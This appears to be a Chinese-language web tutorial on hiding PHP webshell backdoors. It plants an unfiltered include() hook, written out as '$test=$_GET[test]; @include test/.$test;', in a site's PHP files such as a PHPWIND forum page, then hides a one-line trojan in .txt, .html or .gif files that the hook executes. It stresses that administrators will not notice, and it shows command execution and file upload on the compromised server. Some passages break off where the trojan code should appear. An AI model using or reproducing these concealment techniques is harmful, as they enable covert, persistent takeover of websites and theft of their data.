- 相關推薦
關于PHP后門的隱藏技巧
很多人都有一個疑問,是否能把我那一句話木馬隱藏到HTML或圖片里,其實把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了,如果說硬是要放到 HTML文件或圖片里,那就看看小編為大家搜索整理的PHP后門的隱藏技巧,希望能給大家?guī)韼椭?更多精彩內(nèi)容請及時關注我們考試網(wǎng)!
要知道如果光把PHP語句放到圖片里是無論如何也不能執(zhí)行的,因為PHP只解析擴展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執(zhí)行。我們就的借助PHP中的調用函數(shù) :include 、require 等。
記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include("x.gif")這樣的語句來調用隱藏在圖片的木馬語句。ASP中語句也類似。看似非常隱蔽但直接調用圖片對稍微懂點PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù),這就使得插入木馬的性能得不到發(fā)揮。
Include 函數(shù)在PHP中使用的比較頻繁,所以引起的安全問題也實在太多,例如PHPWIND1.36的漏洞就是因為include后面的變量沒做過濾引起的。由此我們就可以構造類似的語句來插入到PHP文件中。然后把木馬隱藏到圖片或HTML文件里,可以說隱蔽性就更高了。如在PHPWIND論壇里插入下面的語句:<‘’?@include> 一般管理員是無法看出來的。
有了include 函數(shù)來輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來了。因為txt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統(tǒng)里是最為常見的了,下面我們就依次來做測試。
首先建立一PHP文件test.php 文件內(nèi)容為:
$test=$_GET[test];
@include test/.$test;
?>
Txt文件一般都是說明文件,所以我們把一句話木馬放到目錄的說明文件里就OK了。隨便建立一個TXT文件t.txt。我們把一句話木馬粘貼到 t.txt文件里。然后訪問 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的內(nèi)容就證明Ok了, 然后把在lanker微型PHP后門客戶端 木馬地址添入 http://localhost/test/test.php?test=../t.txt 密碼里添入cmd就可以了,執(zhí)行返回的結果都可以看到。
對于HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調用執(zhí)行而且不被顯示出來,我們可以在HTML里加入一個隱藏屬性的文本框 ,如: 然后使用方法同上。執(zhí)行的返回結果一般都可以查看源文件看到。 如使用查看本程序目錄功能。查看源文件內(nèi)容為 我可以得到目錄為 C:Uniserver2_7swww est。
下面我們說說圖片文件,要說最為毒的一招莫過于把木馬隱藏到圖片里。我們可以直接對一個圖片進行編輯,把插入到圖片末尾
經(jīng)測試一般都不會對圖片造成影響。然后同樣方法客戶端木馬地址添入
我們查看PHP環(huán)境變量 返回的是結果是原圖片。
這里可能要和我們想象的結果有些差距了,其實命令已經(jīng)運行了,只是返回的結果看不到而已,因為這是真正的GIF文件,所以是不會顯示返回結果的,為了證明是否真的執(zhí)行了命令我們執(zhí)行上傳文件命令。果不出所料,文件已經(jīng)成功上傳到服務器上。這樣偽造的優(yōu)點是隱蔽性好。缺點也自然不用說了是沒回顯。如果你想看到返回的結果,那就拿出記事本偽造一個假的圖片文件吧。
到這里就基本測試完了,怎樣隱蔽PHP后門就看你自己的選擇了。行文倉促,如有不妥之處,請指出!
【PHP后門的隱藏技巧】相關文章:
PS隱藏技巧大全05-19
關于php面試寶典及PHP面試技巧08-16
excle隱藏技巧有哪些09-25
MongoDB的PHP驅動方法與技巧大全09-08
隱藏文件夾顯示技巧06-22
電腦桌面系統(tǒng)的限制與隱藏技巧08-16
PHP的壓縮函數(shù)06-21
php高級教程01-23
隱藏電腦文件的方法08-28